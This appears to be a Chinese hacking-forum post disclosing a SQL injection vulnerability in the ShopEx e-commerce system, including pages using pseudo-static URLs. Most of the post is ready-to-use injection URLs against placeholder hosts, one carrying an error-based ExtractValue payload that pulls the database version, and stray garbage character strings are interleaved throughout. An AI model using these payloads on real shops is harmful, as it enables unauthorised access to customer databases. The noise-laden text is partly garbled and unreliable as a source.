注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ; ? R- K; H& [ D
& `' y# Z9 z4 n8 r4 P好吧,我扯远了~~3 F) U+ `6 d0 F% o5 s
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~: Z2 v2 s7 N3 |* O
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: / |" M; f6 @8 H) g/ z
8 ?. X- U+ x8 u$ l# y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
! e- {5 Z$ K5 \( v" v; z$ ?
' U+ o, h+ ?* r$ x$ [: r! phttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html . A2 T5 | J* `
$ W T1 q0 N- j) \' B9 ?http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
- c/ \- u; z8 V m7 z. ]! _+ R' M! a1 N% t5 a- J5 u i0 \: o! d: [
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ( e: e3 A" G6 V
8 V+ ^4 \0 k. H% h/ v1 J! j
( S D t0 B; |一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
/ A( H9 U0 |1 N) _5 [1 V如何注入就不多说了,10多年的东西了…不会也会了… / \& [1 N! I$ k! u
' T ]1 V# P# H2 j
& m4 E* q6 b. _4 h
0 E! J. R& l0 P8 }( q
+ ~, Y) i: b$ ~7 D7 } |